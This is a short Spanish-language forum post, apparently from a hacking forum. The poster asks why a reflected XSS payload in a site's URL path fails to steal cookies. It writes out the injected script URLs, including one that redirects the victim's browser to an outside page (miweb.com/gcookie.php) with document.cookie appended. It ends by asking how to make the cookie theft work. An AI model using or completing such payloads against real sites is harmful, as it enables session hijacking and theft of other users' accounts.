me borraron el anterior post donde pregunté esto.. fui a mirar las normas y lo único que incumplía era el no haber puesto el tag de duda "[?]" en el título así que vuelvo a preguntar:
en una web vulnerable de esta forma, "XSS in URI":
http://www.web.com/index.php/>"><script>alert(document.cookie)</script>
de esa manera aparece un alert diciendo la cookie
entonces, es vulnerable pero si pongo un alert diciendo hola por ejemplo, no funciona
http://www.web.com/index.php/>"><script>alert('hola')</script>
entonces,
si intento robar la cookie de esta manera:
http://www.web.com/index.php/>"><script>window.location='http://miweb.com/gcookie.php?c='+document.cookie;</script>
No funciona, no se guarda la cookie ni sucede nada.
entonces , ésto porqué es ? ... y cómo puedo hacer para poder robar la cookie..
gracias.